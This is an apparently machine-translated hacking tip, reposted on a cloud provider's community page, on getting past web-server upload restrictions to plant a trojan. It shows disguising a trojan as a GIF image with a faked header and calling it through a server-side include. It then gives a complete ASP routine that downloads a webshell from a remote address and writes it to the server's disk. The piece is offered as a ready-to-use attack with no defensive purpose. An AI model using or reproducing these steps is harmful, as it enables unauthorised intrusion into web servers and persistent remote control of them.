Some ways to break through abnormal restrictions

Source: Internet
Author: User

Some ways to break through abnormal restrictions
Author: fallen leaves (www.yzteam.net)
Content:
Big Horse transfer restriction Solution
Add GIF98A
First, change the Trojan to the image format.
Then use
<! -- # Include file = "55.jpg" -->
Image to call
You can execute
It's easy.

You can also download the SHELL remotely. The Code is as follows:
<%
Sub eWebEditor_SaveRemoteFile (s_LocalFileName, s_RemoteFileUrl)
Dim Ads, Retrieval, GetRemoteData
On Error Resume Next
Set Retrieval = Server. CreateObject ("Microsoft. XMLHTTP ")
With Retrieval
. Open "Get", s_RemoteFileUrl, False ,"",""
. Send
GetRemoteData =. ResponseBody
End
Set Retrieval = Nothing
Set Ads = Server. CreateObject ("Adodb. Stream ")
With Ads
. Type = 1
. Open
. Write GetRemoteData
. SaveToFile Server. MapPath (s_LocalFileName), 2
. Cancel ()
. Close ()
End
Set Ads = Nothing
End Sub
EWebEditor_SaveRemoteFile "Name of the Trojan file to be saved, for example, (x. TXT) Note: Do not upload the ASP suffix. Otherwise, the remote download SHELL only has the login page", "The SHELL address to download"
%>
 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.